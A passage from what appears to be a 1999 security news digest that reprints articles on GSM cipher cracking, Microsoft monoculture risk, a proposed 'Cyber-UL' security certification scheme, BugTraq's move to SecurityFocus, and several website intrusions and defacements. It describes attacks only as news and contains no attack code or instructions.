sending data along to the states. In addition, officials said, individuals in every state will have an opportunity to appeal administrative actions. Virginia, for instance, will give parents up to 10 days before seizing assets, a state official said. Critics wonder what might happen to someone who is away on vacation or business. ``A Social Security number is not a bullet-proof identifier. There are always going to be mistakes,'' said Mary J. Culnan, a business professor at Georgetown University's McDonough School of Business, who drew an analogy to problems with the accuracy of credit reports in the early 1990s. Finally, the operation appears to be at odds with the Clinton administration's recent push to make privacy a priority. Last month, Clinton called on banks and other financial institutions to give consumers more control over how their information is gathered and used. ``President Clinton believes that consumers deserve notice and choice about the use of their personal information,'' said a White House memo about the event. (End Optional Trim) The assurances of officials do little to assuage the fears of people who worry about the potential ills of having a government that closely monitors its citizens. Such anxieties have been underscored by mistakes child-support enforcement workers have made in recent years. Last year, officials in Virginia had to apologize to 2,300 parents for misidentifying them as delinquent and announcing they would lose their hunting and fishing licenses. Officials attributed the mistake to a computer programming error. ``We're not perfect,'' a state official said at the time. California officials also misidentified hundreds of men after it began the federally mandated, data-driven crackdown on deadbeats. In some cases, they confused men who had similar names. ``In my estimation, this is going to be nothing more than a huge invasion of privacy,'' said James Dean of Oshkosh, Wis., who was unable to get a fishing license because he refused to provide his Social Security number. AP-NY-06-26-99 1916EDT @HWA 18.0 GSM Mobile Security is Cracked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Weld Pond The A5/1 over-the-air voice privacy algorithm used by almost all GSM digital phones is no longer secure. A5/1 is the algorithm used by GSM phones to encrypt communications. It is theorized that software to decrypt captured conversations will be available within a year. The COMP128 algorithm used to authenticate GSM phones for network access, was cracked last year. The Australian GSM mobile security is cracked By DAN TEBBUTT 22jun99 DIGITAL mobile phone users could soon face the threat of eavesdropping, following a breakthrough reverse engineering effort in the United States. Three California researchers say they have cloned the secret encryption method used to secure Global System for Mobile (GSM) communications. Research leader Marc Briceno predicted unscrambling software could appear before the end of the year, following academic papers studying possible faults in the A5/1 over-the-air voice privacy algorithm. This standard is used in nearly all digital mobile phones in Australia. Inherent flaws in the security technology suggested special cracking hardware devices could unscramble GSM conversations within seconds, according to Mr Briceno, director of the US-based Smartcard Developers Association. A network of personal computers could unlock the encryption method within a matter of hours. "Mobile users should be worried about this," he said. "Calls can be intercepted by a moderately motivated adversary who by no means needs to be a cryptography expert. "The telecommunications providers' promise that GSM is secure with respect to random listeners can certainly no longer be maintained." The reverse engineering project would allow greater public scrutiny over closely guarded GSM security technologies, he said. The reference implementation would allow academic cryptographers to probe for deficiencies in A5/1. "Once the holes are found, any competent programmer can write an implementation to exploit those shortcomings." Vodafone technical director Jonathan Withers warned against over-stating theoretical problems. "Practical attacks are pretty hard," he said. But Mr Withers confirmed that GSM security standards were watered down after concerns were raised by law enforcement agencies. "A5/1 is set at a level that is deemed appropriate and acceptable by law enforcement," he said. Telstra and Optus representatives declined to comment. Australian Communications Authority standards and compliance manager Grant Symons defended digital security as adequate for the job. "The GSM algorithm has proven its worth for people engaged in everyday business and social activities. We're not talking about the military here," he said. Mr Briceno said the synthesised algorithm was so functionally similar to the real A5/1 code that it could complete published GSM encryption benchmarks. Last year he was part of a University of California, Berkeley, team that broke the COMP128 algorithm used to authenticate GSM phones for network access prompting fears of billing fraud on digital mobile phones. "In a business environment, where people believe their call is secure, the cost of eavesdropping could be a lot more than a few dollars on a phone bill," Mr Briceno said. @HWA 19.0 Microsoft Mono-culture Poses National Security Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Adam This article asks the right question "Is Microsoft a threat to national security?" but misses a few key points. The threat is worse than this article says. Remember Melissa made it on board a Navy ship and jumped the supposed air-gap onto SIPRNet two things that could not have happened if the military was not dependent on one company's productsts. The article talks about a CyberUL type of organization, this idea has been around for a while and was first proposed by Tan. Oh, and the part of a Mac being unhackable, don't believe it. Forbes CyberUL Proposal- By Tan HNN Archive for March 31, 1999- Melissa on board 7th Fleet HNN Archive for April 5, 1999- Melissa Jumps AirGap onto SIPRNet Forbes; Is Microsoft a threat to national security? IN SEPTEMBER 1997, the USS Yorktown, the Navy's first "smart ship," was conducting routine maneuvers off Cape Charles, Va. Things were fine until the onboard computer system, powered by Microsoft NT software, crashed, leaving the ship dead in the water for 2 hours and 45 minutes. Communications were knocked out. Weapons systems were down. The propulsion system wouldn't restart. If you think rebooting your laptop after it freezes is a drag, how would you like to try and reboot an entire battle cruiser? Was it sabotage or an electromagnetic pulse? Nothing so dramatic: The computer was simply asked to divide by zero. Officials were quick to exonerate Microsoft for the glitch, claiming it was human error, and the Navy continues to install Windows NT servers on all its cruisers and destroyers, some 84 ships in all. Perhaps Navy brass haven't heard the joke making the rounds in military computer circles: What does NT stand for? Needs towing. The question is, What would have happened if this had occurred in battle? Of course, the Navy should modernize its fleet, incorporating the best computer technology this nation's geeks can create within the fabric of its ships. Should the Navy rely on Microsoft products, which have proved to be unstable, unreliable, hard to troubleshoot and riddled with security holes? It is ironic that as one part of the U.S. government goes after Microsoft in court, accusing it of monopolistic practices, Microsoft is quietly gaining a monopoly over another part. Hackers--and now virus makers--have long delighted in taunting the "Satan from Redmond," churning out software programs that exploit holes in Microsoft products. Some of them have deliciously crude names, too, like Back Orifice, a software program originally created by a group called The Cult of the Dead Cow. Because Back Orifice enables a user to control and monitor a Windows operating system over a network without being detected, it is on just about every good hacker's laptop. It is easy to find--type it into almost any search engine and you'll encounter lists of sites that offer it as a free download. What is particularly distressing is the emergence of the Microsoft mono-technology culture, in which its many products are tightly bundled together--Windows OS plus Microsoft Excel plus Microsoft Word plus Microsoft Outlook E-mail could very well equal big trouble. As Microsoft's dominance grows, Microsoft users become even more vulnerable. Case in point: In March, the Melissa virus swept America, spreading when a user opened an attached Microsoft Word file. Upon activation, it looked for Outlook--Microsoft's E-mail, newsreader and personal information manager--created a message, and sent it to the first 50 people listed in the user's address book. Thankfully, the virus did not destroy or alter data, or trash hard drives, but it did flood networks with E-mail. This was not true of "Explore.exe," an Internet worm named for the file that launches it. In June, Explore.exe erased billions of gigs of information around the world. Melissa and Explore.exe received wide coverage in the media, but you may not have heard of the most recent Microsoft security hole in Microsoft's Internet Information Server, which, according to eEye Digital Security Team, left approximately 90% of 1.3 million Microsoft web servers vulnerable to hack attacks. It seems that as soon as Microsoft develops a patch to combat a new exploit, someone comes up with a new one. By the time you read this column, I wouldn't doubt that more holes will be identified and plugged. "No one knows what evil lurks in these 40 million lines of Windows NT code," says Rick Forno, author of The Art of Information Warfare. "You have to roll the dice and take your chances." His solution: Buy a Mac. They are virtually unhackable, he says. And he's not kidding. But Forno, who truly believes that Microsoft is a threat to our nation's security, has other ideas, too. He proposes a kind of software version of the Underwriters Laboratory, a not-for-profit product safety testing group for electronics that has been around since 1894. It is responsible for the "UL-approved" stickers you see on lamps, Christmas tree lights and clock radios. As for me, I'd like to change the model by which software companies peddle their products. Instead of allowing them to license software, which lets them dodge responsibility for poor quality, software vendors should be held liable for glitches that lead to security snafus and crashes. If you bought a car with locks on the door that didn't work properly, odds are the manufacturer would be held liable. So should software makers. In addition, the government, and corporations, could lessen the impact of the next round of Melissa viruses or Explore.exe worms by relying on more than one operating system. The less we depend on one type of operating system, the less vulnerable we are. Of course, this runs smack into Bill Gates' monopolistic vision: to place Windows on every computer, PDA, Navy ship and toaster. But Gates is only the richest man in the world, not the only software vendor in town. And that's how he should be treated. Do you think heavy reliance on Microsoft products threatens our national security? Let me know in my forum. Related links: The Art of Information Warfare Underwriters Laboratory CyberUL Proposal- By Tan (Reprint) Cyberspace Underwriters Laboratories [2] Cyberspace Underwriters Laboratories - 01/11/1999 Underwriters Laboratory Underwriters Laboratories was founded in 1894 by an electrical inspector from Boston, William Henry Merrill. In 1893, Chicago authorities grew concerned over the public safety due to the proliferation of untamed DC circuits and the new, even more dangerous technology of AC circuits. These new and little-understood technologies threatened our society with frequent fires which caused critics to question if the technology could ever be harnessed safely. Merrill was called in and setup a one-room laboratory with $350.00 in electrical test equipment and published his first report on March 24, 1894. Back in Boston, insurance underwriters rejected Merrill's plans for a non-biased testing facility for certification of electrical devices. Chicago however, embraced the idea. Merrill took advantage of the situation in Chicago to get up and running and within months had support at the national level. Today, UL has tested over 12,500 products world-wide and is a internationally recognized authority on safety and technology. The UL mark of approval has come to provide an earned level of trust between customers and manufacturers and safely allowed our society to leverage hundreds of inventions that would have otherwise been unfit for public use. While originally targeting inventions which could potentially cause physical harm to the user, the UL has expanded into the listing of alarm system products as well as alarm system installers. Individual products are listed as meeting UL standards and the companies that install those products are also listed as qualified to install the product as intended. Insurance companies have leveraged the UL's scrutiny to properly ascertain their risks. Cyberspace Today, technology continues to grow at a rapid pace, perhaps even out of control. The commercialization of the Internet has led many businesses to offer services out there in what has been called the Wild Wild West (WWW). As a result, the public safety is at risk. Utilities are bridging control systems to Internet attached back-office systems. Banks are offering 'cyber-banking' and merchants are collecting information about consumers as they transact their business over the Web. Individual privacy and the fiduciary trust banks and merchants have established over hundreds of years are open to new threats as these activities become more and more prevalent. Similarly to early electrical inventions, today's computer security products may introduce more harm than good when implemented by end users. While some of these products do what they claim, most do not. The lack of standards and meaningful certification has allowed the sale of products that are either intentionally or unintentionally snake-oil. While many of the products may solve old problems and inadvertently introduce worse ones, some just do not perform as advertised at all. For instance, some products have been marketed as utilizing the latest and greatest encryption mechanisms when in fact, the version they are selling does not utilize any encryption at all. Just as in the late 1800's, the consumers have little understanding of the inventions they are purchasing. They are presented with claims by the product's marketers and have no way of proving those claims to be true or false. Just as it was back then, this has not stopped the large-scale application of these inventions, regardless of public safety. In the late 1900's, nobody has stepped up to the plate to expand the UL's role into computer security products or to take that role as their own. To some extent, groups like Nomad Mobile Research Center and L0pht Heavy Industries have acted as modern day Merrill's, publishing non-biased findings to this affect. This is not to say that certification of computer security products has not been attempted in the past. ICSA for instance, operates a certification program for products. CISSP and other organizations also offer certification of information security professionals. These organizations however, have failed drastically at providing what the UL has provided on a more general 'technology' level. These failures could be examined in detail but such an excersise is outside the scope of this article. The bottom line for ICSA is that it does not have the rigorous standards that the UL has and its credibility has suffered as a result. ICSA fails to see the certification process as ongoing or cyclical allowing for products to inherit their 'certification'. As a result, it is believed by some that there is a problem in that there is a lack of non-biased inspection of software and that money buys more certifications than good product design and implementation. CISSP certifies individuals in the computer security industry. While sorting out those who are fluent in the industry jargin and concept, the work of CISSP's still lacks accountability in that their certification is tied to a test rather than what the UL referrs to as a 'field counter-check'. Like most computer certifications however, this is simply a test of test-taking skills rather than a test of experience and understanding. Cyber-UL Product certification needs to be performed on every version of a product. Small changes that could ripple through traditional technologies causing safety problems are at least ten fold when applied to computer software. Many similarities may be drawn between the certification of computer security products and the listing of alarm systems and components that UL performs today. UL has a stringent set of tests which are performed on physical security systems which seek UL listing. For instance, safes and vaults have a number of different labels which indicate their adherence to different standards. UL utilizes 'young hotshot' safe-crackers wishing to make a name for themselves, to do the actual testing. This way, specialists are motivated (by not only fame but by financial compensation as well) to validate the claims that the vendors' marketing people want to make. The entire safe and vault business operates around these ratings to communicate to the customer what it is that the product was designed to do. Based on value and risk, a customer may choose to spend more or less on higher or lower rated labels. The two major factors which influence the level of rating are time and tools. The 'hotshot' safe-crackers are given samples of the product and guidelines for their attempts to defeat its security. For instance, a TL-30 rating means that the cracker is limited to tools not including torches or explosives and is given 30 minutes of actual working time to defeat the security. If X6 is appended to the rating, the rating applies to not only the door, but the container (the rest of the safe). This aligns the vendor's claims to the actual performance of the product. Also, if a new version of the safe comes out, it does not inherit the old version's listing, it must be re-listed. This addresses a big problem that was sure to arise with safe vendors and has definitely risen in the computer security arena. Customers, due to human nature, want products to be certified as 'secure'. Just as customers like to hear promises of security, vendors love to make them. In 1913, UL tested the first 'security devices'. With this expansion into security devices, they recognized the need to replace the word 'Approved' with the words 'Inspected' or 'Listed'. Due to what UL has established with security devices, customers are not lulled into a false sense of security and vendors do not make outrageous claims. Customers are presented with 'product x is rated at rating y' rather than 'its ICSA certified'. Vendors claim to be resistant to certain toolsets for certain amounts of time. This is not what the computer security field looks like today, but is where it needs to go. The manufacturer and consumer must realize that testing 'security' is not the same as testing 'functionality' and because of that, claims need to be adjusted to fit reality. If a door-knob opens a door, the door works. If a safe-lock opens when you dial the combination, it does not mean the safe works. You can however, perform tests on the safe to assure that it operates as advertised within certain heat and force constraints. While listing individual devices as meeting UL standards is useful to a security professional or consumer, it is only a small part of the picture. Installation and configuration of components is critical to the actual effectiveness of the security solution. For this reason, installation of alarm systems is another area of influence for the UL. This may seem like a daunting task since the number of implementations is exponential to the number of products. UL has, with only about 4,000 employees, listed more than 12,500 products in over 40 countries and developed over 600 standards for product safety. The tact taken to assure the correct installation of alarm systems has been to list alarm installation companies. Systems installed by UL listed companies may qualify for a UL issued certificate. The certificate registers the customer's alarm system becomes an eligible candidate for 'field counter-checks' (spot-audits) which are performed to assure that listed installers are not cutting corners. If a system which has received a certificate fails the field counter-check, the installer could potentially loose their UL listing. The UL has maintained a quality program by scaling the number of field counter-checks as needed. Problems with the model While the UL model for security devices seems to address many of the same issues that surround Cyberspace, there are a number of problems with deploying the model for computer security devices as it stands. The first problem is that if a security system is defeated in the physical world, it is typically very obvious to those who come into work on Monday and see that the money is gone and the safe is in pieces. Detection of a cyber intrusion is typically NOT very obvious to those who come into work on Monday. Because of this fact, safe-crackers have very limited time to crack a vault. Hackers on the other hand, have unlimited time to crack a system. Once they get in, safe crackers typically REMOVE items which then become 'missing'. Hackers typically COPY items unless their motives are political rather than financial, leaving the originals and the system intact. For cyber intrusions to become less surreptitious, intrusion detection needs to mature and become more widely deployed if 'time' is to be a meaningful factor in the process. The commercial model is based around the storage of valuables, particularly jewelry and cash. In addition to the (American) UL standards (TL-15, TL-30, TRTL-30, TRTL-15/6, TRTL-30/6, TXTL-60), there is a German standard (A,B,C1,C2,D 10, D20, E 10) and a Scandinavian standard (60-80, 80-100, 100-120, 120-140, 140-160, 160-180, 180-200, 200-240, 240-280, 280-320, 320-360). All three are based on time and tools. Time and tools is an excellent set of criteria for rating computer security components in areas such as encryption. In America, the various insurance agencies determine what rating is required for them to insure a given amount to be stored in the safe or vault. In Europe, the Dutch Safe Rating Committee publishes a similar standard assigning a range of financial value to each rating in each of the three systems. This does not, however, address liability for storage of information such as credit ratings, social security numbers, bank balances, web surfing preferences, political affiliations, which is subject not only to theft but to alteration or even just surreptitious access. When storing sensitive information, a more appropriate place to look for examples is to the government. Classified information presents many of the same requirements for storage that sensitive information on the public or even commercial interests. To meet the U.S. Government's needs in this area, General Services Administration (GSA) has published standards (classes 1-8, black, red, green and blue labels) which rate storage containers for everything from weapons to information processing systems to filing cabinets. They additionally publish information on storage of confidential, secret, and top-secret materials in GSA Approved (or Non-GSA Approved) containers. This information includes additional requirements for alarm systems, restricted building access, guard check points, etc... Specifics on GSA classes and labels are seemingly difficult to come by. Based on the information I have found in the document library of however, much of what has been worked out by the GSA could potentially serve as a foundation for developing similar standards for the storage of information on the public. The U.S. Department of Commerce has commissioned the National Institute of Standards and Technology (NIST) to maintain FIPS PUB 140-1, Security Requirements For Cryptographic Modules. The document sets forth a standard for specification of cryptographic-based security systems protecting unclassified information. It provides for product ratings from 1 to 4 with 1 being lame and 4 being k-rad. This range is designed to cover a wide range of data sensitivity, from 'low value administrative data' to 'million dollar funds transfers' to 'life protecting data'. The standard is typically utilized for devices which protect tokens or encrypt data such as crypto boxes. While this system may or may not be successful in real life, it certainly deserves closer examination in that it represents what may be the closest thing that the U.S. Government has to UL for computer security products. Under the FIPS 140-1 Testing and Validation model, vendors select an accredited FIPS 140-1 testing lab, submit their 'module' for testing and pay the testing fee. The lab then tests the product for conformance to FIPS 140-1 and passes a report on the 'module' to NIST/CSE for validation. Throughout this process, the lab may submit questions for guidance and clarification to NIST/CSE. If the report is favorable, a validation certificate is issued by NIST/CSE for the 'module'. The certificate is presented to the vendor through the lab and the 'module' is added to the published list of Validated FIPS 140-1 Modules. The problem may stem from the difference between UL's roots and those of ICSA and CISSP. It certainly manifested itself in the fact that the UL is the only one providing non-biased product inspections as well as accountability for the quality of the installations out there in the field. Requirements for the use of 'listed' intrusion detection systems, encryption mechanisms, and companies could on its own make an impact if that listing actually meant something. The use of strict procedures and specific levels of physical security could be required as in the GSA model and this too could help the private sector. This has not been the tact taken to date, however. The second problem is that manufacturers of physical security devices are pressured by customers to have a UL listing. This is because customers are pressured by insurance underwriters to use products that meet UL specifications. In Cyberspace, businesses currently feel that the embarrassment and loss of public trust are more costly than the actual damage caused by hackers. Citibank has become the most well-known example of what happens when computer intrusions are made public knowledge. By taking commendable actions and not covering up the intrusion, Citibank is now known as the bank that got hacked instead of the bank that handled the situation appropriately. Since silence seems to be the best policy, cyber merchants choose to 'eat' their losses rather than risk the negative publicity. Until these losses become intolerable and insurance is necessary, there may be no motivation to drive the certification, approval or listing of products by UL or any similar organization. It took UL about 30 years from being subsidized by the insurance agencies to being self-supporting off fees paid by manufacturers for testing. Merrill was the first full-time employee as a result of this change. Insurance underwriters and Consumer Product Safety Commission were instrumental in gaining public acceptance of UL work. It was the public's safety that was of concern and liability drove companies to insure. Insurance underwriters found they were then saddled with the problem and addressed it effectively with the UL. Perhaps at some point the collection and storage of information on the public will carry some sort of liability with it. A Call for Action Without a call for action, I would simply be a whiner. At this point, you the reader can assist with very little effort. Whether you are a vendor, insurance company, end user, or hacker, let me know your thoughts on the state of the industry, the state of the UL and/or this article's conclusions. As a hacker, is the relationship between the hot-shot safe crackers and the UL an attractive one you would be interested in? Is the UL listing process for installations sufficient? Will it encounter problems unforeseen by this article? As an insurer, am I missing part of the picture; are companies actually insuring their computer systems and data to mitigate loss or liability? As a manufacturer do you foresee problems with the UL model being imposed on computer security products? As an end user do you feel that computer security is important? Do you feel that the current system actually is sufficient? Have you been wanting something better or do you feel that you are being slighted by my insinuation that you do not fully understand the products you purchase? Any and all feedback on this article would be appreciated no matter where it comes from (although manufacturer comments will be taken with a grain of salt). Forward those comments to If there is enough feedback, I may write a follow up article on this topic. I am considering going into detail on each rating system UL, German, Scandinavian, GSA and FIPS 140-1, highlighting overlaps with the computer security discepline. Thanks to the UL for providing documentation on the history of the UL and directing me to Peter Tallman of the Melville, N.Y. office. Thanks to Peter Tallman for clarifying some of the issues surrounding the listing of safes and alarm systems and directing me to Beverly Borowski whom I hope can assist me in my future research. Also of use to date was FED-STD-809, the federal standard for neutralization and repair of GSA approved containers as well as a yearly publication by the Dutch Safe Rating Committee called 'Recommendations for Insuring Money in Safes and Strongrooms'. GSA's web site ( provides a searchable index of federal standards including FED-STD-809. The Dutch Safe Rating Committee is at Stichting Kwaliteitsbeoordeling Brandkasten (SKB), P.O. Box 85764, 2508 CL The Hague, The Netherlands - Tel. 070-3912008. Additional thanks to the researchers at the L0pht for their assistance, particularly to Brian Oblivion for providing extensive documentation on FIPS 140-1. @HWA 20.0 BugTraq Moves To SecurityFocus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Aleph One BUGTRAQ, the premier security mailing list, will officially be moving from its current home at to on July 5th. Security Focus will be a major security web site featuring complete BugTraq archives, Daily News, vulnerability information and lots lots more. Security-Focus InfoWorld Security Watch | Stuart McClure and Joel Scambray Portals open on security landscape AS SECURITY GROWS into a major concern for IT shops, a number of online security portals have sprouted up. These offer nearly everything you'll need to manage security at your site. A number of Web pages have begun in the last couple of months, but the most impressive ones are just now opening. We have frequented many in our security travels, and we think that, a site debuting the week of June 26, looks the most promising for providing comprehensive and one-stop security information. Since we started Security Watch more than a year ago, we've seen our column's name borrowed by a number of people. Now you'll have to add, in Belgium, to that list ( According to its semiveiled Web page, the site will debut July 5 and will offer the usual security news, products, trends, jobs, literature, and links. But, like, also promises a vulnerability database. The depth and breadth of its vulnerability archive remains to be seen, however, as we have yet to receive an offer to preview this site (surprise, surprise). One of the earliest collections of security resources on the Internet came from The site has been available for more than a few months and offers security news, reviews, exploits, and tools. Although its content isn't as complete or as well organized as that of some others, it offers a decent set of security resources and timely vulnerabilities that we have frequented and highly recommend checking out. has been around for a number of months and offers a fairly good set of security content including a weekly column, security news, discussion forums, services, a research center (links and resources), and even an online store. It also offers a centralized location to search for computer security jobs at all the major career sites, including Career Builder, Career Mosaic, and Monster Board. is a relative newcomer and at first glance looks much like a general search engine. The site offers a variety of security information and resources, and even allows you to add your URL to its site. But unlike and, SecureZone does not offer its own vulnerability database. Also, we experienced delays when using the site; be prepared for a wait. The site is run by En Garde Systems (, the product vendor that offers the nifty security software T-Sight and IP-Watcher. The heavy hitter Combine the Bugtraq archive (, Packet Storm's exploits and tools (, and Hacker News Network's timely news (, and you'll barely scratch the surface of the content provided on ( The new Web site should be up this week and will offer one of the best collections of security resources available on the Internet. We got a sneak peak at this site and were duly impressed. For starters, Securityfocus. com offers one of the most up-to-date security news sections available. Also included on the site are security tools, products, books, an events calendar, and forums. But unlike many of its competitors, offers a robust -- and free -- vulnerability database. The site also lets you query for only the technology that's important to you. For example, if you're primarily a Solaris 2.51 shop running Netscape Enterprise Server, you can query only the relevant vulnerabilities. You can personalize the entire Web site by selecting the type of news, calendar events, products, tools, and vulnerabilities you care about. will also provide a free applet for your desktop that will warn you as soon as a relevant vulnerability is released. is the brainchild of the original Secure Networks group. The team created the Ballista security scanner product (now named CyberCop Scanner from Network Associates) and has discovered numerous product vulnerabilities on its own. Aleph One, the moderator and caretaker of the Bugtraq mailing list (one of the most widely subscribed computer lists in the world), has added his muscle to the site in offering the entire Bugtraq archive as part of the vulnerability database. Also, the entire Bugtraq mailing list will be moved to so archives can be searched. After witnessing the birth of so many security portals on the Internet during the past year, we can't help but wonder what's next for the security community. Personally, we wouldn't mind seeing the paging service that warns administrators about new vulnerabilities the minute they become public, or maybe the downloading of daily security news to your Pilot with AvantGo ( In any case, the future is definitely bright for security professionals. Check out these portals and let us know which ones you'll be visiting at Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's eSecurity Solutions group. They have managed information security in academic, corporate, and government environment @HWA 21.0 MS Gives Out Pirate Dough ~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Code Kid Microsoft is planning to give away up to $25 million over the next five years, or half of it proceeds from its antipiracy efforts, toward technology access and education projects around the world. MS estimates that it will receive aprox $10 million in civil and criminal antipiracy proceeds annually over the next five years. Wired Microsoft Shares Piracy Loot Reuters 3:00 a.m. 29.Jun.99.PDT Microsoft plans to give away half its proceeds from efforts to crack down on software piracy, or at least US$25 million over the next five years, a company executive said. Brad Smith, general counsel for worldwide sales and support for Microsoft, said the software company is seeing a growing stream of revenue from settlements and criminal penalties assessed against counterfeiters. See also: Germany Jails Software Pirate "Obviously we rely heavily on law enforcement for support," Smith said. "Given that support from the public sector, we felt it was proper to share some of these recoveries with the communities that, like the company, are suffering from piracy." He said that Microsoft, which had $14.5 billion in revenues last year, expects at least $10 million in civil and criminal antipiracy proceeds annually over the next five years, although he said the company is spending more than that on efforts to enforce software laws. Smith said piracy is not necessarily growing, but authorities are increasing their enforcement in part because many large counterfeiting operations are connected to organized crime. "The reason we go after it so much is because we're cutting off a major source of funding for criminal syndicates," said Marc Frank, a Westminster, California, police sergeant who heads the multi-agency Asian Organized Crime Task Force. "It's not because we're the Microsoft police," he said. "It's because we're hitting the organized criminal syndicate where it hurts them -- in the pocketbook." The task force's efforts culminated this year with a raid on a factory in the southern California city where officers found $2.5 million in manufacturing equipment and more than $40 million worth of counterfeit Microsoft Windows, Office, and other programs. A total of 11 people have been arrested or indicted in connection with the raid, Frank said. Microsoft's donations will go toward technology access and education projects around the world, Smith said. Copyright 1999 Reuters Limited. @HWA 22.0 Biometrics comes to Home Shopping ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by RickDogg The Home Shopping Network will introduce biometric security to a large variety of consumers when it launches its voice-print technology next month. This new technology will enable HSN to automatically identify customers by their voice. This will allow repeat customers to order products faster and will allow HSN to create a very accurate customer database. Wired Giving Voice to Net Security by Leander Kahney 3:00 a.m. 29.Jun.99.PDT The Home Shopping Network next month will be able to automatically identify customers on the phone by their voices. In the first large-scale deployment of its kind, HSN's speech-print service will allow frequent shoppers to dispense with passwords and personal identification numbers, the company said. See also: Biometric Banking Bides Time Voice recognition is just the first step: HSN said it hopes to completely automate the ordering process by the end of the year. Based on technology from Nuance Communications, the voiceprint system will ask callers for their phone numbers. Callers will then be passed on to human order-takers to complete the purchase. "[Voice-recognition systems] are a lot more convenient for the customer and can save the company a lot of money," said Steve Ehrlich, Nuance's vice president of marketing. Automated phone-ordering systems can cost 90 percent less than conventional, human-operated systems, according to Ehrlich, who said Charles Schwab will roll out a similar system later this year. He said the technology handles a number of languages and copes well with regional accents and things like bad phone lines and stuffy noses. In addition to convenience, the technology will help HSN build a detailed database of its customers, said Bill Meisel, editor and publisher of the Speech Recognition Update, a monthly newsletter. Currently, a household is issued a single verification number by HSN. The voiceprint technology will allow the company to identify and collect data on individual members in a household, Meisel said. "These are the kind of subtle advantages that make fraud prevention almost a secondary consideration," he said. However, Meisel said the voiceprint system will be more secure than using a verification number. To crack the system would require a wiretap to obtain an accurate recording of someone's voice, Meisel said. It should not be possible to simply use a tape recorder. "The process of taping a voice changes its acoustic characteristics," he said. "It wouldn't work with a tape recorder ... practically speaking, it's very difficult [to crack the system]." Meisel said similar voice-recognition systems are in use in prisons, where calling rights are a form of prison commerce. @HWA 23.0 Palm VII Revealed ~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Kingpin Too poor to buy a Palm VII? Don't want to risk your new toy? Well one brave soul has taken apart his Palm VII, taken pictures, and posted them to the web. A nice treat for you hardware guys. The Gadgeteer @HWA 24.0 Who Is HNN? ~~~~~~~~~~~ June 29th From HNN contributed by Space Rogue A lot of people have asked just who is it that runs HNN and keeps the place together. We have created a page to answer just that question. The page even has pictures and everything. Who Is HNN? HNN will be packing up shop and heading for Las Vegas sometime around Wednesday next week. We will do what we can to update the site remotely but the updates may be periodic at best. Besides who is going to be around to read HNN if everyone is at Defcon? @HWA 25.0 AntiOnline on the trail of f0rpaxe ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From AntiOnline Tracks F0rpaxe Tuesday, June 29, 1999 at 14:00:15 by John Vranesevich - Founder of AntiOnline AntiOnline investigations into the recent wave of attacks being done by a group known as 'F0rpaxe' has led to the discovery of the true-life-identity of the group's leader, aka m1crochip. F0rpaxe is known to have broken into over 130 servers in the past two months, belonging to dozens of different organizations, including: NASA Goddard Space Flight Center US Navy US Coast Guard US Department of Agriculture US Department of the Interior University of Wisconsin Harvard University University of Colorado Georgetown University University of Michigan UC Davis F0rpaxe officially 'Declared War' against the US government after the FBI raided several malicious hackers, including individuals known to be members of the 'gH' hacking group, which is believed to be responsible for attacks against the White House's Website. F0rpaxe released a statement earlier this month which read in part: We think that FBI should explain what a fuck they are doing. For the moment we wont destroy the servers we hack but if it is necessary we can burn alot of servers. M1crochip, along with several other F0rpaxe members, have been featured in several publications, including MSNBC and Wired News. F0rpaxe's latest attack took place yesterday, against servers at UCLA. AntiOnline was able to gain the name and phone number of m1crochip, who lives in the city of Perafita, Portugal, shortly after a request for information came in. Note: AntiOnline will not release information on this individual to the general public. @HWA 26.0 Critical NOAA Web Site Attacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by Mortel The Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA) was defaced yesterday. While the site was primarily used to distribute severe weather warnings, that information was available from other sources such as the National Weather Service. Unfortunately NOAA chose to run critical services such as email on the same machine so when they took down the server to correct the defacement their email was also off line creating severe disruptions in office work flow. HNN Cracked Pages Archive Fox News MSNBC Computer World Andover News Correction: 1615EST We have been informed that the email server was not on the same machine as the web server but was taken offline as a precautionary measure until the extent of the attack could be determined. Fox; Hackers Hit Storm Prediction Web Site 8:16 p.m. ET (017 GMT) June 29, 1999 NORMAN, Okla. Computer hackers vandalized the Web page of the top U.S. weather agency's storm prediction center Tuesday in the latest of a rash of attacks on government Internet sites, officials said. The attack blocked the Internet weather warnings of the Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA), at a time of year when powerful thunderstorms and tornadoes can break out across the Plains states. "If there were severe weather already happening at that time of morning, it could have been a problem for a lot of people,'' Dr Joseph Schaeffer, director of the Storm Prediction Center, told Reuters. Hackers calling themselves the "Keebler Elves'' deleted the Storm Prediction Center homepage ( and replaced it with their own page declaring "Learn to fear the elite''. Schaeffer said the same storm forecasts were available elsewhere, including from the National Weather Service. But he said the blockage was an inconvenience to emergency management officials, who are used to quick and easy Internet access to the center's updated weather maps and other data. The attack was discovered at 3:00 a.m. EDT (0700 GMT) by someone trying to find weather data and reported quickly, so storm center technical staffers shut down the Web page. Repairing the damage and tracing and recording the hacker's steps for potential future criminal prosecution would keep the Web site down until late Tuesday, officials said. The damage also shut down the Web page of NOAA's Severe Storm Laboratory (, which is next door to the storm prediction center in Norman, Oklahoma. The Internet pages for both centers are run from the same computer, which was invaded by the hackers. The U.S. Army earlier Tuesday said it had launched a criminal investigation into an electronic break-in of its main Internet site, but stressed that hackers did not breach military security or operations. A hacker group also broke into four U.S. Department of Agriculture Web sites over the weekend, the USDA said. Military and other government officials have voiced major concern over repeated break-ins in the past year by electronic wizards anxious to simply show their hacking ability or to actually steal secrets. In March, a Pentagon-sponsored study ordered by Congress in 1995 concluded that military computer and communications systems were increasingly vulnerable to attack by hackers and high-tech enemies. -=- Computer World; Weather Web site hit by intruders By Kathleen Ohlson The National Oceanic and Atmospheric Administration's (NOAA) Storm Prediction Center became the latest Web target of hackers when one or more intruders broke into the site. Both the site and e-mail for the Storm Prediction Center, based in Norman, Okla., were taken down as soon as the infiltration was detected, said Tim Tomastik, the NOAA's 